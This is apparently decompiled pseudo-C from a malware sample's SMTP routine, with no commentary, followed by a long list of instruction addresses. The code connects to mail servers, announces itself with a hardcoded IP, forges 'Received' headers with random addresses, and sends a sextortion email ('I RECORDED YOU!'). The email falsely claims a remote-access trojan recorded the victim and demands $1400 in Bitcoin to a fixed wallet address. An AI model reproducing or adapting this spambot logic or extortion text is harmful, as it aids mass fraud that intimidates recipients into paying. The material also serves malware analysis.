                                                                                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                                                                                    				void* _t201;
                                                                                                                                                                                                                                                                                    				void* _t203;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t197 - 0x49c)) = wsprintfA(_t197 - 0x490, "RCPT TO: <%s>\r\n",  *((intOrPtr*)(_t197 + 8)));
                                                                                                                                                                                                                                                                                    					_t167 = E00EA1120( *((intOrPtr*)(_t197 - 0x1c)), _t197 - 0x490,  *((intOrPtr*)(_t197 - 0x49c))); // executed
                                                                                                                                                                                                                                                                                    					_t201 = _t199 + 0x18;
                                                                                                                                                                                                                                                                                    					if(_t167 != 0) {
                                                                                                                                                                                                                                                                                    						 *(_t197 - 0x20) = 5;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L48:
                                                                                                                                                                                                                                                                                    					while( *(_t197 - 0x20) != 0 &&  *(_t197 - 0x20) != 8) {
                                                                                                                                                                                                                                                                                    						_t171 = E00EA1160( *((intOrPtr*)(_t197 - 0x1c)), _t197 - 0x490, 0x400); // executed
                                                                                                                                                                                                                                                                                    						_t203 = _t201 + 0xc;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t197 - 0x90)) = _t171;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t197 - 0x90)) != 0) {
                                                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                                                    							 *((char*)(_t197 +  *((intOrPtr*)(_t197 - 0x90)) - 0x490)) = 0;
                                                                                                                                                                                                                                                                                    							_t172 = E00EA11C0(_t197 - 0x490);
                                                                                                                                                                                                                                                                                    							_t201 = _t203 + 4;
                                                                                                                                                                                                                                                                                    							if(_t172 != 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *(_t197 - 0x718) =  *(_t197 - 0x20);
                                                                                                                                                                                                                                                                                    								 *(_t197 - 0x718) =  *(_t197 - 0x718) - 1;
                                                                                                                                                                                                                                                                                    								if( *(_t197 - 0x718) > 6) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								switch( *((intOrPtr*)( *(_t197 - 0x718) * 4 +  &M00EA223C))) {
                                                                                                                                                                                                                                                                                    									case 0:
                                                                                                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                                                                                                    										_push("ESMTP");
                                                                                                                                                                                                                                                                                    										if(StrStrA(_t197 - 0x490) == 0) {
                                                                                                                                                                                                                                                                                    											_t176 = wsprintfA(_t197 - 0x490, "HELO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t204 = _t201 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t197 - 0x494) = _t176;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											_t179 = wsprintfA(_t197 - 0x490, "EHLO %s\r\n", "[102.129.143.99]");
                                                                                                                                                                                                                                                                                    											_t204 = _t201 + 0xc;
                                                                                                                                                                                                                                                                                    											 *(_t197 - 0x494) = _t179;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t178 = E00EA1120( *((intOrPtr*)(_t197 - 0x1c)), _t197 - 0x490,  *(_t197 - 0x494)); // executed
                                                                                                                                                                                                                                                                                    										_t201 = _t204 + 0xc;
                                                                                                                                                                                                                                                                                    										if(_t178 != 0) {
                                                                                                                                                                                                                                                                                    											 *(_t197 - 0x20) = 3;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(_t197 - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 1:
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 2:
                                                                                                                                                                                                                                                                                    										L16:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x88;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x88, "<%s>",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "MAIL FROM: %s\r\n", __ebp - 0x88);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x498) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x498);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x498)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 4;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 3:
                                                                                                                                                                                                                                                                                    										goto L0;
                                                                                                                                                                                                                                                                                    									case 4:
                                                                                                                                                                                                                                                                                    										L21:
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "DATA\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 6;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 5:
                                                                                                                                                                                                                                                                                    										L24:
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x61c;
                                                                                                                                                                                                                                                                                    										E00EA1320(__ebp - 0x61c, 5, __ebp - 0x61c) = wsprintfA(__ebp - 0x508, "%s.com", __eax);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    										__ebp - 0x710 = E00EA1490(0, __ebp - 0x710, 1); // executed
                                                                                                                                                                                                                                                                                    										Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    										__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    										__eax = E00EA1490(0, __ebp - 0x690, 0); // executed
                                                                                                                                                                                                                                                                                    										__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t57 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t61 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xfe;
                                                                                                                                                                                                                                                                                    										_t65 = __eax % 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = __eax / 0xfe;
                                                                                                                                                                                                                                                                                    										__eax = rand();
                                                                                                                                                                                                                                                                                    										asm("cdq");
                                                                                                                                                                                                                                                                                    										__ecx = 0xd2;
                                                                                                                                                                                                                                                                                    										_t69 = __eax % 0xd2;
                                                                                                                                                                                                                                                                                    										E00EA1390(0xd2, 7, __ebp - 0x6a8) = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    										__eax = wsprintfA(__ebp - 0x490, "Received: from %s ([%d.%d.%d.%d]) by %s with MailEnable ESMTP; %s\r\n", __ebp - 0x490, _t69 + 1, _t65 + 1, _t61 + 1, _t57 + 1, __ebp - 0x508, __ebp - 0x690);
                                                                                                                                                                                                                                                                                    										__esp = __esp + 0x24;
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    										__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    										if(__eax != 0) {
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x710;
                                                                                                                                                                                                                                                                                    											E00EA1320(__ecx, 3, __ebp - 0x628) = __ebp - 0x69c;
                                                                                                                                                                                                                                                                                    											__eax = E00EA1320(__ecx, 5, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    											__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__eax = wsprintfA(__ebp - 0x490, "Received: (qmail %s invoked by uid %s); %s\r\n", __eax, __eax, __ebp - 0x490);
                                                                                                                                                                                                                                                                                    											__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    											__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    											__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    											__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    											if(__eax != 0) {
                                                                                                                                                                                                                                                                                    												__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    												__eax = wsprintfA(__ebp - 0x490, "From: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    												__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    												__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    												__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    												__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    												if(__eax != 0) {
                                                                                                                                                                                                                                                                                    													__ecx =  *(__ebp + 8);
                                                                                                                                                                                                                                                                                    													__eax = wsprintfA(__ebp - 0x490, "To: %s\r\n",  *(__ebp + 8));
                                                                                                                                                                                                                                                                                    													__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    													__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    													__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    													if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)) != 0) {
                                                                                                                                                                                                                                                                                    														__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    														__eax = wsprintfA(__ebp - 0x490, "Subject: %s\r\n", "I RECORDED YOU!");
                                                                                                                                                                                                                                                                                    														__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    														__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    														__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    														__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    														if(__eax != 0) {
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x690;
                                                                                                                                                                                                                                                                                    															__eax = wsprintfA(__ebp - 0x490, "Date: %s\r\n", __ebp - 0x690);
                                                                                                                                                                                                                                                                                    															__esp = __esp + 0xc;
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    															__eax =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    															__ecx = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    															__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    															if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x508;
                                                                                                                                                                                                                                                                                    																__ecx = __ebp - 0x628;
                                                                                                                                                                                                                                                                                    																E00EA1320(__ecx, 6, __ecx) = E00EA1320(__ecx, 6, __ebp - 0x69c);
                                                                                                                                                                                                                                                                                    																__eax = __ebp - 0x490;
                                                                                                                                                                                                                                                                                    																__eax = wsprintfA(__ebp - 0x490, "Message-ID: <%s.%s@%s>\r\n", __ebp - 0x490, __ebp - 0x490, __ebp - 0x508);
                                                                                                                                                                                                                                                                                    																__esp = __esp + 0x14;
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x714) = __eax;
                                                                                                                                                                                                                                                                                    																__ecx =  *(__ebp - 0x714);
                                                                                                                                                                                                                                                                                    																__eax =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x490,  *(__ebp - 0x714)); // executed
                                                                                                                                                                                                                                                                                    																if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																	__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																	if(E00EA1120( *(__ebp - 0x1c), "Mime-Version: 1.0\r\n", 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																		__eax = E00EA1120( *(__ebp - 0x1c), "Content-type: text/plain;\r\n\r\n", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																		if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = memset(__ebp - 0x610, 0, 0x104);
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcpy(__ebp - 0x610, "Hello there!\r\n\r\n") = strcat(__ebp - 0x610, "Unfortunately, there are some bad news for you.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "Some time ago your device was infected with my private trojan, R.A.T (Remote Administration Tool), if you want to find out more about it simply use Google.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "You truly enjoy checking out porn websites and watching dirty videos, while having a lot of kinky fun.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			__ebp - 0x610 = strcat(__ebp - 0x610, "All you need is $1400 USD in Bitcoin (BTC) transfer to my account (Bitcoin equivalent based on exchange rate during your transfer).\r\n\r\n");
                                                                                                                                                                                                                                                                                    																			__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																			strcat(__ebp - 0x610, "After the transaction is successful, I will proceed to delete everything without delay.\r\n\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																			__eax = E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    																			if(__eax != 0) {
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				memset(__ebp - 0x610, 0, 0x104) = strcpy(__ebp - 0x610, "Afterwards, we can pretend that we have never met before.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "In addition, I assure you that all the harmful software will be deleted from your device.\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "My Bitcoin (BTC) address is: 1EJJoUCykyZT3FtxRGSpuUsiBxCiHQ4wqX\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				__ebp - 0x610 = strcat(__ebp - 0x610, "Everything will be carried out based on fairness!\r\n\r\n");
                                                                                                                                                                                                                                                                                    																				__ecx = __ebp - 0x610;
                                                                                                                                                                                                                                                                                    																				strcat(__ebp - 0x610, "An advice from me - regularly change all your passwords to your accounts and update your device with newest security patches.\r\n.\r\n") =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    																				if(E00EA1120( *(__ebp - 0x1c), __ebp - 0x610, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 7;
                                                                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                                                                    																					 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                                                                    																				 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                                                                    																			 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                                                                    																		 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                                                                    																 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                                                                    															 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                                                                    														 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                                                                    													 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *(__ebp - 0x20) = 0;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    									case 6:
                                                                                                                                                                                                                                                                                    										L47:
                                                                                                                                                                                                                                                                                    										__ecx =  *(__ebp - 0x1c);
                                                                                                                                                                                                                                                                                    										__eax = E00EA1120( *(__ebp - 0x1c), "QUIT", 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    										 *(__ebp - 0x20) = 8;
                                                                                                                                                                                                                                                                                    										goto L48;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L49:
                                                                                                                                                                                                                                                                                    					 *(_t197 - 8) = 0 |  *(_t197 - 0x20) == 0x00000008;
                                                                                                                                                                                                                                                                                    					__imp__#22( *((intOrPtr*)(_t197 - 0x1c)), 2); // executed
                                                                                                                                                                                                                                                                                    					__imp__#3( *((intOrPtr*)(_t197 - 0x1c)));
                                                                                                                                                                                                                                                                                    					return  *(_t197 - 8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c27
                                                                                                                                                                                                                                                                                    0x00ea1c40
                                                                                                                                                                                                                                                                                    0x00ea1c58
                                                                                                                                                                                                                                                                                    0x00ea1c5d
                                                                                                                                                                                                                                                                                    0x00ea1c62
                                                                                                                                                                                                                                                                                    0x00ea1c70
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00ea1c64
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea220c
                                                                                                                                                                                                                                                                                    0x00ea1ab4
                                                                                                                                                                                                                                                                                    0x00ea1ab9
                                                                                                                                                                                                                                                                                    0x00ea1abc
                                                                                                                                                                                                                                                                                    0x00ea1ac9
                                                                                                                                                                                                                                                                                    0x00ea1ad0
                                                                                                                                                                                                                                                                                    0x00ea1ad6
                                                                                                                                                                                                                                                                                    0x00ea1ae5
                                                                                                                                                                                                                                                                                    0x00ea1aea
                                                                                                                                                                                                                                                                                    0x00ea1aef
                                                                                                                                                                                                                                                                                    0x00ea1af6
                                                                                                                                                                                                                                                                                    0x00ea1af9
                                                                                                                                                                                                                                                                                    0x00ea1b08
                                                                                                                                                                                                                                                                                    0x00ea1b15
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b1b
                                                                                                                                                                                                                                                                                    0x00ea1b21
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b28
                                                                                                                                                                                                                                                                                    0x00ea1b3c
                                                                                                                                                                                                                                                                                    0x00ea1b71
                                                                                                                                                                                                                                                                                    0x00ea1b77
                                                                                                                                                                                                                                                                                    0x00ea1b7a
                                                                                                                                                                                                                                                                                    0x00ea1b3e
                                                                                                                                                                                                                                                                                    0x00ea1b4f
                                                                                                                                                                                                                                                                                    0x00ea1b55
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b58
                                                                                                                                                                                                                                                                                    0x00ea1b92
                                                                                                                                                                                                                                                                                    0x00ea1b97
                                                                                                                                                                                                                                                                                    0x00ea1b9c
                                                                                                                                                                                                                                                                                    0x00ea1baa
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00ea1b9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bb6
                                                                                                                                                                                                                                                                                    0x00ea1bbf
                                                                                                                                                                                                                                                                                    0x00ea1bc6
                                                                                                                                                                                                                                                                                    0x00ea1bcc
                                                                                                                                                                                                                                                                                    0x00ea1bdb
                                                                                                                                                                                                                                                                                    0x00ea1be2
                                                                                                                                                                                                                                                                                    0x00ea1be8
                                                                                                                                                                                                                                                                                    0x00ea1beb
                                                                                                                                                                                                                                                                                    0x00ea1bf1
                                                                                                                                                                                                                                                                                    0x00ea1bff
                                                                                                                                                                                                                                                                                    0x00ea1c03
                                                                                                                                                                                                                                                                                    0x00ea1c0d
                                                                                                                                                                                                                                                                                    0x00ea1c1b
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00ea1c0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1c7c
                                                                                                                                                                                                                                                                                    0x00ea1c83
                                                                                                                                                                                                                                                                                    0x00ea1c87
                                                                                                                                                                                                                                                                                    0x00ea1c91
                                                                                                                                                                                                                                                                                    0x00ea1c9f
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00ea1c93
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cab
                                                                                                                                                                                                                                                                                    0x00ea1cc9
                                                                                                                                                                                                                                                                                    0x00ea1ccf
                                                                                                                                                                                                                                                                                    0x00ea1cdd
                                                                                                                                                                                                                                                                                    0x00ea1cea
                                                                                                                                                                                                                                                                                    0x00ea1cf2
                                                                                                                                                                                                                                                                                    0x00ea1cfb
                                                                                                                                                                                                                                                                                    0x00ea1d0a
                                                                                                                                                                                                                                                                                    0x00ea1d11
                                                                                                                                                                                                                                                                                    0x00ea1d16
                                                                                                                                                                                                                                                                                    0x00ea1d17
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d1c
                                                                                                                                                                                                                                                                                    0x00ea1d22
                                                                                                                                                                                                                                                                                    0x00ea1d27
                                                                                                                                                                                                                                                                                    0x00ea1d28
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d2d
                                                                                                                                                                                                                                                                                    0x00ea1d33
                                                                                                                                                                                                                                                                                    0x00ea1d38
                                                                                                                                                                                                                                                                                    0x00ea1d39
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d3e
                                                                                                                                                                                                                                                                                    0x00ea1d44
                                                                                                                                                                                                                                                                                    0x00ea1d49
                                                                                                                                                                                                                                                                                    0x00ea1d4a
                                                                                                                                                                                                                                                                                    0x00ea1d4f
                                                                                                                                                                                                                                                                                    0x00ea1d6c
                                                                                                                                                                                                                                                                                    0x00ea1d73
                                                                                                                                                                                                                                                                                    0x00ea1d79
                                                                                                                                                                                                                                                                                    0x00ea1d7c
                                                                                                                                                                                                                                                                                    0x00ea1d82
                                                                                                                                                                                                                                                                                    0x00ea1d90
                                                                                                                                                                                                                                                                                    0x00ea1d94
                                                                                                                                                                                                                                                                                    0x00ea1d9e
                                                                                                                                                                                                                                                                                    0x00ea1dac
                                                                                                                                                                                                                                                                                    0x00ea1dc5
                                                                                                                                                                                                                                                                                    0x00ea1dce
                                                                                                                                                                                                                                                                                    0x00ea1ddc
                                                                                                                                                                                                                                                                                    0x00ea1de3
                                                                                                                                                                                                                                                                                    0x00ea1de9
                                                                                                                                                                                                                                                                                    0x00ea1dec
                                                                                                                                                                                                                                                                                    0x00ea1df9
                                                                                                                                                                                                                                                                                    0x00ea1e00
                                                                                                                                                                                                                                                                                    0x00ea1e04
                                                                                                                                                                                                                                                                                    0x00ea1e0e
                                                                                                                                                                                                                                                                                    0x00ea1e25
                                                                                                                                                                                                                                                                                    0x00ea1e2c
                                                                                                                                                                                                                                                                                    0x00ea1e32
                                                                                                                                                                                                                                                                                    0x00ea1e35
                                                                                                                                                                                                                                                                                    0x00ea1e3b
                                                                                                                                                                                                                                                                                    0x00ea1e49
                                                                                                                                                                                                                                                                                    0x00ea1e4d
                                                                                                                                                                                                                                                                                    0x00ea1e57
                                                                                                                                                                                                                                                                                    0x00ea1e65
                                                                                                                                                                                                                                                                                    0x00ea1e75
                                                                                                                                                                                                                                                                                    0x00ea1e7b
                                                                                                                                                                                                                                                                                    0x00ea1e7e
                                                                                                                                                                                                                                                                                    0x00ea1e84
                                                                                                                                                                                                                                                                                    0x00ea1e8b
                                                                                                                                                                                                                                                                                    0x00ea1ea0
                                                                                                                                                                                                                                                                                    0x00ea1eb8
                                                                                                                                                                                                                                                                                    0x00ea1ebf
                                                                                                                                                                                                                                                                                    0x00ea1ec5
                                                                                                                                                                                                                                                                                    0x00ea1ec8
                                                                                                                                                                                                                                                                                    0x00ea1ece
                                                                                                                                                                                                                                                                                    0x00ea1edc
                                                                                                                                                                                                                                                                                    0x00ea1ee0
                                                                                                                                                                                                                                                                                    0x00ea1eea
                                                                                                                                                                                                                                                                                    0x00ea1ef8
                                                                                                                                                                                                                                                                                    0x00ea1f0b
                                                                                                                                                                                                                                                                                    0x00ea1f11
                                                                                                                                                                                                                                                                                    0x00ea1f14
                                                                                                                                                                                                                                                                                    0x00ea1f1a
                                                                                                                                                                                                                                                                                    0x00ea1f21
                                                                                                                                                                                                                                                                                    0x00ea1f2c
                                                                                                                                                                                                                                                                                    0x00ea1f36
                                                                                                                                                                                                                                                                                    0x00ea1f44
                                                                                                                                                                                                                                                                                    0x00ea1f4b
                                                                                                                                                                                                                                                                                    0x00ea1f66
                                                                                                                                                                                                                                                                                    0x00ea1f74
                                                                                                                                                                                                                                                                                    0x00ea1f7b
                                                                                                                                                                                                                                                                                    0x00ea1f81
                                                                                                                                                                                                                                                                                    0x00ea1f84
                                                                                                                                                                                                                                                                                    0x00ea1f8a
                                                                                                                                                                                                                                                                                    0x00ea1f98
                                                                                                                                                                                                                                                                                    0x00ea1f9c
                                                                                                                                                                                                                                                                                    0x00ea1fa6
                                                                                                                                                                                                                                                                                    0x00ea1fbb
                                                                                                                                                                                                                                                                                    0x00ea1fc9
                                                                                                                                                                                                                                                                                    0x00ea1fe2
